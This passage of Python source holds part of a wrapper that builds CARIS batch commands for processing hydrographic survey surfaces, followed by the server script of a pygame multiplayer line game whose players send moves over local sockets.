C:\HIPSData\Products\VR.csar file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run PopulateVRSurface --population-method ' + mode + ' --input-band Depth' fullcommand += ' --include-flag ACCEPTED --iho-order ' + iho + ' --vertical-uncertainty "Depth TPU"' fullcommand += ' --horizontal-uncertainty "Position TPU" --display-bias HIGHEST --disambiguation-method DENSITY_LOCALE' if self.noaa_support_files: fullcommand += ' --cube-config-file="' + self.cubeparams + '" --cube-config-name="NOAA_VR"' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line pass else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def add_to_raster(self, outputname): '''Runs AddtoHIPSGrid with all the options. Example: carisbatch.exe --run AddtoHIPSGrid file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\CUBE1m.csar''' fullcommand = self.hipscommand + ' --run AddtoHIPSGrid' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def remove_from_raster(self, outputname): '''Runs RemoveFromHIPSGrid with all the options. Example: carisbatch.exe --run RemoveFromHIPSGrid file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\CUBE1m.csar''' fullcommand = self.hipscommand + ' --run RemoveFromHIPSGrid' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def add_to_vr(self, outputname): '''Runs AddtoVRSurface with all the options. Example: carisbatch.exe --run AddToVRSurface file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\CUBE1m.csar''' fullcommand = self.hipscommand + ' --run AddtoVRSurface --update-type BOTH' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def remove_from_vr(self, outputname): '''Runs RemoveFromVRSurface with all the options. Example: carisbatch.exe --run RemoveFromVRSurface file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\CUBE1m.csar''' fullcommand = self.hipscommand + ' --run RemoveFromVRSurface --update-type BOTH' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def add_to_mosaic(self, outputname, beampattern, type): '''Runs AddToSIPSMosaic with all the options. Example carisbatch.exe --run AddToSIPSMosaic --mosaic-engine SIPS_SIDESCAN file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\Mosaic.csar''' fullcommand = self.hipscommand + ' --run AddtoSIPSMosaic --mosaic-engine ' + type fullcommand += ' --beam-pattern-file "' + beampattern + '"' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def remove_from_mosaic(self, outputname): '''Runs AddToSIPSMosaic with all the options. Example carisbatch.exe --run RemoveFromSIPSMosaic --mosaic-engine SIPS_SIDESCAN file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\Mosaic.csar''' fullcommand = self.hipscommand + ' --run RemoveFromSIPSMosaic' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def render_raster(self, surface, outputname, bandname='Depth'): '''Runs RenderRaster with all the options. Example: carisbatch.exe --run RenderRaster --input-band Depth C:\HIPSData\Products\Raster.csar C:\HIPSData\Products\Rasterimg.csar''' fullcommand = self.hipscommand + ' --run RenderRaster --input-band ' + bandname fullcommand += ' ' + ' "' + surface + '" "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def export_raster(self, surface, output_type, outputname, bandname='Depth', forcebase=False): '''Runs ExportRaster with all the options. Example: carisbatch.exe --run ExportRaster --output-format GeoTIFF --include-band Depth C:\HIPSData\Products\VR.csar C:\HIPSData\Products\VR.tiff''' if forcebase: if not self.basecommand: lic, msg = self.caris_base_license_check(printout=False) if not lic: return fullcommand = self.basecommand + ' --run ExportRaster --output-format ' + output_type + ' --include-band' else: fullcommand = self.hipscommand + ' --run ExportRaster --output-format ' + output_type + ' --include-band' fullcommand += ' ' + bandname + ' "' + surface + '" "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def shift_raster(self, inputfile, outputfile, shiftfile, inputformat='RASTER', input_band='Depth', elev_band='NAD83_MLLW'): r'''Runs ShiftElevationBands with all the options. Example: carisbatch.exe --run ShiftElevationBands --shift-type RASTER --input-band ALL --shift-file "D:\NAD83-MLLW_Expanded.csar" --elevation-band NAD83_MLLW "D:\F00768_Laser.csar" "D:\F00768_Laser_New_NAD83_MLLW.csar"''' fullcommand = self.hipscommand + ' --run ShiftElevationBands --shift-type ' + str(inputformat) fullcommand += ' --input-band ' + input_band + ' --shift-file "' + shiftfile + '" --elevation-band ' + elev_band fullcommand += ' "' + inputfile + '" "' + outputfile + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def import_points_to_csar(self, source, output_epsg, dest_csar, resolution='8m', prim_band='Depth', grid_method='BASIC', inputformat='ASCII', input_epsg=None, infofile=None): '''Runs ImportPoints with all the options. Example: carisbatch.exe --run ImportPoints --input-format ASCII --input-crs EPSG:26918 --output-crs EPSG:26918 --gridding-method BASIC --resolution 8m --info-file c:\path_to_info_file --primary-band Depth c:\path_to_ascii_data c:\path_to_dest_csar''' if not self.basecommand: lic, msg = self.caris_base_license_check(printout=False) if not lic: return if str(inputformat) == 'ASCII': fullcommand = self.basecommand + ' --run ImportPoints --input-format ' + str(inputformat) if input_epsg: fullcommand += ' --input-crs EPSG:' + str(input_epsg) fullcommand += ' --output-crs EPSG:' + str(output_epsg) if infofile: fullcommand += ' --info-file "' + str(infofile) + '"' else: print('Invalid input format - {}. This format is not supported.'.format(inputformat)) return if grid_method: fullcommand += ' --resolution ' + str(resolution) + ' --gridding-method ' + grid_method fullcommand += ' --primary-band ' + prim_band + ' "' + source + '" "' + dest_csar + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def export_csar_to_ascii(self, inputcsar, output_crs, outputascii, inputband='Depth', inputprecision='9', coordformat='LLDG_DD'): '''Runs ExportCoverageToASCII with all the options. Example: carisbatch.exe -r exportcoveragetoascii --include-band Depth 9 --output-crs EPSG:6319 --coordinate-format LLDG_DD --coordinate-precision 9 --coordinate-unit m "F00768_Laser_rawdepths.csar" "F00768_Laser_rawdepths.txt"''' # 9 is max precision in carisbatch fullcommand = self.hipscommand + ' --run exportcoveragetoascii --include-band "' + str(inputband) + '" ' + str(inputprecision) fullcommand += ' --output-crs EPSG:' + output_crs + ' --coordinate-format "' + coordformat + '" --coordinate-precision ' fullcommand += inputprecision + ' --coordinate-unit m "' + inputcsar + '" "' + outputascii + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def vr_csar_to_sr_csar(self, surface, output_res, outputname): '''Runs ResampleSurfacetoRaster with all the options. Example: carisbatch.exe --run ResampleSurfacetoRaster --output-format GeoTIFF --include-band Depth C:\HIPSData\Products\VR.csar C:\HIPSData\Products\VR.tiff''' fullcommand = self.hipscommand + ' --run ResampleSurfacetoRaster --resolution ' + str(output_res) fullcommand += ' "' + surface + '" "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def bag_to_csar(self, bag, outputname): '''Runs CopytoCsar with all the options. Example: carisbatch.exe --run CopytoCsar C:\HIPSData\Products\bag.bag C:\HIPSData\Products\bag.csar''' fullcommand = self.hipscommand + ' --run CopytoCsar' fullcommand += ' "' + bag + '" "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def qctools_py3(self, outputname, flierfinder=False, gridqa=False, holidayfinder=False, holidayfindermode="OBJECT_DETECTION", vr=False): # retrive the path to the "activate.bat" activate_file = retrieve_activate_batch() # script's input variables grid_path = outputname # VR # grid_path = "C:\\Users\\gmasetti\\Desktop\\test_vr\\H12880_MB_1m_MLLW_Final.csar" # SR flier_finder = "0" holiday_finder = "0" grid_qa = "0" if flierfinder: flier_finder = "1" if holidayfinder: holiday_finder = "1" if gridqa: grid_qa = "1" start = retrieve_noaa_folder_path() spackages = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))) qcscripts = os.path.join(spackages, 'Python3', 'hyo2', 'qc', 'scripts', 'qc_scripts.py') startpy = retrieve_install_prefix() if os.path.exists(grid_path): args = ["cmd.exe", "/K", "set pythonpath=", "&&", # run shell (/K: leave open (debugging), /C close the shell) activate_file, "Pydro367", "&&", # activate the Pydro36 virtual environment 'python', qcscripts, # call the script with a few arguments '"' + grid_path.replace("&", "^&") + '"', # surface path flier_finder, # flier finder arguments holiday_finder, holidayfindermode, # holiday finder arguments grid_qa, # grid QA arguments self.sheet_name + '_QC' # QCTools Output Folder Name ] subprocess.Popen(' '.join(args), creationflags=subprocess.CREATE_NEW_CONSOLE) else: print("**QCTools skipped: This surface does not exist: {}**".format(grid_path)) def log_to_pdf(self): outputpdf = os.path.splitext(self.logger)[0] + '.pdf' pdfclass = pyText2Pdf.pyText2Pdf(input_file=self.logger, output_file=outputpdf) pdfclass.Convert() def open_hips(self): fullcommand = '"' + os.path.join(os.path.split(self.hipscommand)[0], 'caris_hips.exe') + '"' fullcommand += ' "' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips"') subprocess.Popen(fullcommand)
Server.py
# Copyright (c) 2019 Grzegorz Raczek # https://github.com/grzracz # Files available under MIT license from queue import Queue import pygame import socket import threading import time import random import sys import winsound host = "192.168.137.1" port = 10000 class Server: def __init__(self, host_addr, port): thread = threading.Thread(target=self.run) thread.daemon = True thread.start() self.host = host_addr self.port = port self.client = "" self.connected = "" self.q = Queue(5) self.color = (255, 255, 255) def clear_queue(self): while not self.q.empty(): self.q.get() def run(self): serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) serversocket.bind((self.host, self.port)) print("Server running:", self.host + ":" + str(self.port)) serversocket.listen(1) while True: (clientsocket, address) = serversocket.accept() self.client = clientsocket.recv(64).decode() print("Client with address", self.client, "connected to socket", self.host + ":" + str(self.port)) self.connected = True # CAN DO SOMETHING HERE WITH THE CLIENT YOU ARE CONNECTED TO while True: info = clientsocket.recv(128) if not info: break # DO SOMETHING WITH WHAT WAS SENT command = info.decode() if command == "LEFT" or command == "RIGHT" or command == "UP" or command == "DOWN": if self.q.full(): print(self.client + ":", "queue is full, unable to store command:", command) else: print(self.client + ":", command) self.q.put(command) else: print(self.client, "sent an unknown command:", info) # DO SOMETHING WHEN CLIENT DISCONNECTS self.connected = False self.clear_queue() print("Client with address", self.client, "disconnected from socket", self.host + ":" + str(self.port)) class Player: def __init__(self, server, starting_point, color, direction, speed): self.server = server self.start_x = starting_point[0] self.start_y = starting_point[1] self.x = self.start_x self.y = self.start_y self.color = color self.start_direction = direction self.direction = self.start_direction self.speed = speed self.stopped = False self.show = True self.points = 0 def change_starting_point(self, point, direction): self.start_x = point[0] self.start_y = point[1] self.x = self.start_x self.y = self.start_y self.start_direction = direction self.direction = self.start_direction def stop(self): self.stopped = True def toggle_show(self): temp = random.randint(0, 4) if temp == 0: self.show = False else: self.show = True def reset(self): self.stopped = False self.x = self.start_x self.y = self.start_y self.direction = self.start_direction self.show = True def draw(self): pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width)) def update(self): if not self.stopped: self.points += 0.1 new_direction = self.direction if not self.server.q.empty(): new_direction = self.server.q.get() if self.direction == "UP": if new_direction != "DOWN": self.direction = new_direction elif self.direction == "DOWN": if new_direction != "UP": self.direction = new_direction elif self.direction == "RIGHT": if new_direction != "LEFT": self.direction = new_direction elif self.direction == "LEFT": if new_direction != "RIGHT": self.direction = new_direction if not self.show: pygame.draw.rect(screen, C.black, pygame.Rect(self.x, self.y, box_width, box_width)) check_pixel_1 = (1, 1) check_pixel_2 = (1, 1) if self.direction == "UP": self.y -= self.speed if self.y < 1: if self.show: pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width)) self.y = height - 1 check_pixel_1 = (self.x, self.y - 1) check_pixel_2 = (self.x + box_width, self.y - 1) elif self.direction == "DOWN": self.y += self.speed if self.y + box_width + 1 > height: if self.show: pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width)) self.y = 2 - box_width check_pixel_1 = (self.x, self.y + box_width + 1) check_pixel_2 = (self.x + box_width, self.y + box_width + 1) elif self.direction == "RIGHT": self.x += self.speed if self.x + box_width + 1 > width: if self.show: pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width)) self.x = 2 - box_width check_pixel_1 = (self.x + box_width + 1, self.y) check_pixel_2 = (self.x + box_width + 1, self.y + box_width) elif self.direction == "LEFT": self.x -= self.speed if self.x < 1: if self.show: pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width)) self.x = width - 1 check_pixel_1 = (self.x - 1, self.y) check_pixel_2 = (self.x - 1, self.y + box_width) if check_pixel_1[0] < 0: check_pixel_1 = (0, check_pixel_1[1]) if check_pixel_1[0] >= width: check_pixel_1 = (width - 1, check_pixel_1[1]) if check_pixel_1[1] < 0: check_pixel_1 = (check_pixel_1[0], 0) if check_pixel_1[1] >= height: check_pixel_1 = (check_pixel_1[0], height - 1) if check_pixel_2[0] < 0: check_pixel_2 = (0, check_pixel_2[1]) if check_pixel_2[0] >= width: check_pixel_2 = (width - 1, check_pixel_2[1]) if check_pixel_2[1] < 0: check_pixel_2 = (check_pixel_2[0], 0) if check_pixel_2[1] >= height: check_pixel_2 = (check_pixel_2[0], height - 1) pygame.draw.rect(screen, self.color, pygame.Rect(self.x, self.y, box_width, box_width)) pixel = pygame.Surface.get_at(screen, check_pixel_1) pixel2 = pygame.Surface.get_at(screen, check_pixel_2) if not (pixel == (0, 0, 0, 255) or pixel == (20, 20, 20, 255)) \ or not (pixel2 == (20, 20, 20) or pixel2 == (0, 0, 0, 255)): return False return True else: return False class StartingPoints: def __init__(self): self.points = [] for x in range(1, 9): for y in range(1, 4): temp = 0 if x % 2 == 0: if y % 2 == 1: self.points.append((int(x * width/10), int(y * height/4), False)) temp += 1 if y % 2 == 0: self.points.append((int(x * width/10), int(y * height/4), False)) temp += 1 def reset(self): for x in range(0, len(self.points) - 1): self.points[x] = (self.points[x][0], self.points[x][1], False) def random_point(self): temp = random.randint(0, len(self.points) - 1) while self.points[temp][2]: temp = (temp + 1) % len(self.points) self.points[temp] = (self.points[temp][0], self.points[temp][1], True) return self.points[temp][0], self.points[temp][1] class Colors: def __init__(self): self.black = (0, 0, 0) self.white = (255, 255, 255) self.grey = (20, 20, 20) self.deadly_grey = (21, 21, 21) self.colors = [] self.colors.append((255, 0, 0, False)) self.colors.append((34, 139, 34, False)) self.colors.append((0, 0, 255, False)) self.colors.append((255, 255, 0, False)) self.colors.append((0, 255, 255, False)) self.colors.append((255, 0, 255, False)) self.colors.append((255, 102, 178, False)) self.colors.append((153, 0, 0, False)) def reset(self): for x in range(0, len(self.colors) - 1): self.colors[x] = (self.colors[x][0], self.colors[x][1], self.colors[x][2], False) def random_color(self): temp = random.randint(0, len(self.colors) - 1) while self.colors[temp][3]: temp = (temp + 1) % len(self.colors) self.colors[temp] = (self.colors[temp][0], self.colors[temp][1], self.colors[temp][2], True) return self.colors[temp][0], self.colors[temp][1], self.colors[temp][2] def random_direction(): temp = random.randint(0, 3) if temp == 0: return "UP" elif temp == 1: return "RIGHT" elif temp == 2: return "DOWN" else: return "LEFT" def servers_connected(servers_list): for x in range(0, number_of_players): if not servers_list[x].connected: return False return True def players_connected(players_list): for x in range(0, number_of_players): if not players_list[x].server.connected: return False return True def players_stopped(players_list): players_stopped_number = 0 for x in range(0, number_of_players): if players_list[x].stopped: players_stopped_number += 1 if players_stopped_number >= number_of_players - 1: return True else: return False def find_moving_player(players_list): for x in range(0, number_of_players): if not players_list[x].stopped: return players_list[x] def get_points(player_input): return player_input.points def draw_menu(players_list, frame_count): pygame.draw.rect(screen, C.black, pygame.Rect(width + box_width, 0, width + menu_width, height)) pygame.draw.rect(screen, C.grey, pygame.Rect(width, 0, box_width, height)) logo_width = logorect.width indent = int((menu_width + box_width - logo_width) / 2) logorect.x = width + indent logorect.y = int(indent / 2) screen.blit(logo, logorect) temp_y = logorect.y + logorect.height + int(indent / 2) temp_x = width + int(indent / 2) screen.blit(text_fieldclosing, (temp_x, temp_y)) temp_x += int(indent/4) temp_y += int(indent/4) time_color = C.white if waiting_for_round: time_left = "10:00" elif not fog_closing: time_left_seconds = str(9 - int(frame_count / 60)) time_left_smaller = str(int((60 - frame_count % 60) * 1.6)) if int(time_left_smaller) < 10: time_left_smaller = "0" + str(int(time_left_smaller)) if frame_count % 60 == 0: time_left_seconds = str(int(time_left_seconds) + 1) time_left_smaller = "00" time_left = str(time_left_seconds + ":" + time_left_smaller) if int(time_left_seconds) < 3: time_color = (255, 0, 0) else: time_color = C.white else: time_color = (255, 0, 0) time_left = "Closing..." text_timeleft = bigfont.render(time_left, True, time_color) rect_width = menu_width - int(1.5 * indent) rect_height = 100 screen.blit(text_timeleft, (temp_x + int((rect_width - text_timeleft.get_width())/2), temp_y + int((rect_height - text_timeleft.get_height())/2))) temp_x -= int(indent/4) temp_y += 2 * int(indent) screen.blit(text_ranking, (temp_x, temp_y)) sorted_players = [] for x in range(0, number_of_players): sorted_players.append(players_list[x]) sorted_players.sort(key=get_points, reverse=True) player_num = 0 for x in sorted_players: temp_y += int(indent/2.5) player_num += 1 text_player_ranking = font.render(str(player_num) + ". Player " + str(x.server.port - (port - 1)) + ": " + str(int(x.points)) + " points", True, x.color) screen.blit(text_player_ranking, (temp_x, temp_y)) if waiting_for_round: temp_x += int(indent / 4) temp_y += int(indent * 4) text_waiting_for_round = font.render("Next round in:", True, C.white) screen.blit(text_waiting_for_round, (temp_x, temp_y)) temp_y += int(indent / 2) text_seconds_to_round = bigfont.render(str(3 - int(frame_count / 60)), True, C.white) screen.blit(text_seconds_to_round, (temp_x + int((rect_width - text_seconds_to_round.get_width())/2), temp_y + int((rect_height - text_seconds_to_round.get_height())/2))) return sorted_players[0].points def scale_fog_value(number, value): for iter1 in range(0, number): value = int(0.75 * value) return value def draw_outline(number): outline_width = 5 current_width = scale_fog_value(number, width) current_height = scale_fog_value(number, height) indent_x = int((width - current_width) / 2) indent_y = int((height - current_height) / 2) pygame.draw.rect(screen, C.grey, pygame.Rect(indent_x, indent_y, current_width, outline_width)) pygame.draw.rect(screen, C.grey, pygame.Rect(indent_x, indent_y, outline_width, current_height)) pygame.draw.rect(screen, C.grey, pygame.Rect(current_width + indent_x, indent_y, outline_width, current_height + outline_width)) pygame.draw.rect(screen, C.grey, pygame.Rect(indent_x, indent_y + current_height, current_width, outline_width)) def draw_fog(percent, number): outline_width = 5 current_width = scale_fog_value(number, width) current_height = scale_fog_value(number, height) previous_width = scale_fog_value(number - 1, width) previous_height = scale_fog_value(number - 1, height) previous_x = int((width - previous_width) / 2) previous_y = int((height - previous_height) / 2) indent_x = int((previous_width - current_width) * percent/200) + outline_width indent_y = int((previous_height - current_height) * percent/200) + outline_width pygame.draw.rect(screen, C.deadly_grey, pygame.Rect(0, 0, width, previous_y + indent_y)) pygame.draw.rect(screen, C.deadly_grey, pygame.Rect(0, 0, previous_x + indent_x, height)) pygame.draw.rect(screen, C.deadly_grey, pygame.Rect(width - previous_x - indent_x, 0, previous_x + indent_x, height)) pygame.draw.rect(screen, C.deadly_grey, pygame.Rect(0, height - previous_y - indent_y, width, previous_y + indent_y)) def get_next_color(colors, number): while True: next_number = (number + 1) % len(colors) number = (number + 1) % len(colors) if not colors[next_number][3]: return next_number def get_previous_color(colors, number): while True: next_number = (number - 1) % len(colors) number = (number - 1) % len(colors) if not colors[next_number][3]: return next_number # GLOBAL VARIABLES/CONSTANTS width = 1920 height = 1080 box_width = 10 start_speed = 2 title = "Lines: Battle Royale!" number_of_players = 2 numbers = ["2", "3", "4", "5", "6"] if len(sys.argv) == 2: if sys.argv[1] not in numbers: print("Incorrect number of players, setting the default: 2") else: print("Number of players:", sys.argv[1]) number_of_players = int(sys.argv[1]) # SERVERS START RUNNING servers = [] for i in range(0, number_of_players): time.sleep(0.1) servers.append(Server(host, port + i)) # APPLICATION STARTS pygame.init() screen = pygame.display.set_mode((width, height), pygame.HWSURFACE, 32) pygame.display.set_mode((width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) surface = pygame.display.get_surface() pygame.display.set_caption(title) clock = pygame.time.Clock() # CONNECTING TO PORTS arrow_left = pygame.image.load("img/arrowleft.png") arrow_right = pygame.image.load("img/arrowright.png") arrow_down = pygame.image.load("img/arrowdown.png") logobig = pygame.image.load("img/linesbig.png") logobig_rect = logobig.get_rect() font = pygame.font.Font("fonts/edosz.ttf", 30) medfont = pygame.font.Font("fonts/edosz.ttf", 32) bigfont = pygame.font.Font("fonts/edosz.ttf", 60) C = Colors() screen.fill(C.black) connected_frames = 0 all_connected = False while not all_connected: for event in pygame.event.get(): if event.type == pygame.QUIT: exit(0) if event.type == pygame.KEYDOWN: if event.key == pygame.K_F11: pygame.display.set_mode((width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: pygame.display.set_mode((width, height)) pygame.mouse.set_visible(True) screen.fill(C.black) indent = int((width - logobig_rect.width) / 2) logobig_rect.x = indent logobig_rect.y = int(indent / 4) screen.blit(logobig, logobig_rect) text = font.render("Please connect to open ports:", True, C.white) temp_y = logobig_rect.y + indent temp_x = int((width - text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) server_counter = 0 temp_y += 50 for s in servers: server_counter += 1 temp_y += int(indent / 18) text = font.render("Player " + str(server_counter) + ": " + s.host + ":" + str(s.port) + ((" (Connected by " + s.client + ")") if s.connected else ""), True, ((3, 125, 80) if s.connected else C.white)) temp_x = int((width - text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) if servers_connected(servers): text = bigfont.render("All players connected! Starting soon: " + str(5 - int(connected_frames / 60)) + "...", True, (2, 100, 64)) temp_y = height - text.get_height() - 20 temp_x = int((width - text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) connected_frames += 1 else: connected_frames = 0 if connected_frames == 300: all_connected = True pygame.display.flip() clock.tick(60) # CHOSING COLORS possible_colors = [(255, 255, 255, False), (224, 205, 255, False), (102, 255, 102, False), (102, 102, 255, False), (255, 255, 0, False), (255, 0, 127, False), (0, 0, 153, False), (255, 0, 0, False), (76, 153, 0, False)] color_number = random.randint(0, len(possible_colors) - 1) players_chose = [] for i in range(0, number_of_players): players_chose.append(False) for s in servers: color_number = get_next_color(possible_colors, color_number) s.clear_queue() while not players_chose[s.port - port]: for event in pygame.event.get(): if event.type == pygame.QUIT: exit(0) if event.type == pygame.KEYDOWN: if event.key == pygame.K_F11: pygame.display.set_mode((width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: pygame.display.set_mode((width, height)) pygame.mouse.set_visible(True) color = possible_colors[color_number] screen.fill(C.black) indent = int((width - logobig_rect.width) / 2) logobig_rect.x = indent logobig_rect.y = int(indent / 4) screen.blit(logobig, logobig_rect) text = font.render("Choose your color:", True, C.white) temp_y = int(logobig_rect.y + indent) - 100 temp_x = int((width - text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) text = bigfont.render("Player " + str(s.port + 1 - port) + ":", True, color) temp_y += int(indent / 10) temp_x = int((width - text.get_width()) / 2) screen.blit(text, (temp_x, temp_y)) rect_side = 100 temp_x = int((width - rect_side)/2) temp_y += int(indent / 4) pygame.draw.rect(screen, C.grey, pygame.Rect(temp_x - 5, temp_y - 5, rect_side + 10, rect_side + 10)) pygame.draw.rect(screen, color, pygame.Rect(temp_x, temp_y, rect_side, rect_side)) temp_x -= int(indent/4) temp_y += int((rect_side - arrow_left.get_rect().height) / 2) screen.blit(arrow_left, pygame.Rect(temp_x, temp_y, arrow_left.get_rect().width, arrow_left.get_rect().height)) temp_x += int(indent/2) + rect_side - arrow_left.get_rect().width screen.blit(arrow_right, pygame.Rect(temp_x, temp_y, arrow_right.get_rect().width, arrow_right.get_rect().height)) text = font.render("Confirm", True, C.white) temp_y += int(indent / 3) temp_x = int((width - text.get_width())/2) screen.blit(text, (temp_x, temp_y)) temp_y += int(indent/16) temp_x = int((width - arrow_down.get_rect().width)/2) screen.blit(arrow_down, pygame.Rect(temp_x, temp_y, arrow_down.get_rect().width, arrow_down.get_rect().height)) if not s.q.empty(): command = s.q.get() if command == "LEFT": color_number = get_previous_color(possible_colors, color_number) winsound.PlaySound("sounds/move.wav", winsound.SND_ASYNC) elif command == "RIGHT": color_number = get_next_color(possible_colors, color_number) winsound.PlaySound("sounds/move.wav", winsound.SND_ASYNC) elif command == "DOWN": winsound.PlaySound("sounds/kick.wav", winsound.SND_ASYNC) s.color = (possible_colors[color_number][0], possible_colors[color_number][1], possible_colors[color_number][2]) possible_colors[color_number] = (possible_colors[color_number][0], possible_colors[color_number][1], possible_colors[color_number][2], True) players_chose[s.port - port] = True pygame.display.flip() clock.tick(60) # MAIN GAMEPLAY menu_width = int(0.2 * width) width -= menu_width text_fieldclosing = font.render("Field closing in:", True, C.white) text_ranking = font.render("Ranking:", True, C.white) logo = pygame.image.load("img/lines.png") crown = pygame.image.load("img/crown.png") logorect = logo.get_rect() crownrect = crown.get_rect() last_time = "" S = StartingPoints() game_ended = False players = [] for i in range(0, number_of_players): players.append(Player(servers[i], S.random_point(), servers[i].color, random_direction(), start_speed)) S.reset() C.reset() screen.fill(C.black) pygame.display.flip() frame_counter = 1 fog_number = 1 waiting_for_round = True draw_menu(players, frame_counter) draw_outline(fog_number) done = False S.reset() for i in range(0, number_of_players): players[i].reset() players[i].update() for i in range(0, 180): for event in pygame.event.get(): if event.type == pygame.QUIT: done = True if event.type == pygame.KEYDOWN: if event.key == pygame.K_F11: pygame.display.set_mode((width + menu_width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: pygame.display.set_mode((width + menu_width, height)) pygame.mouse.set_visible(True) last_time = frame_counter frame_counter = i draw_menu(players, frame_counter) pygame.display.flip() clock.tick(60) while not game_ended: waiting_for_round = False fog_closing = False fog_number = 1 fog_current_percent = 0 frame_counter = 1 screen.fill(C.black) draw_menu(players, frame_counter) draw_outline(fog_number) done = False S.reset() while not done: for event in pygame.event.get(): if event.type == pygame.QUIT: done = True if event.type == pygame.KEYDOWN: if event.key == pygame.K_F11: pygame.display.set_mode((width + menu_width, height), pygame.FULLSCREEN) pygame.mouse.set_visible(False) if event.type == pygame.KEYDOWN: if event.key == pygame.K_ESCAPE: pygame.display.set_mode((width + menu_width, height)) 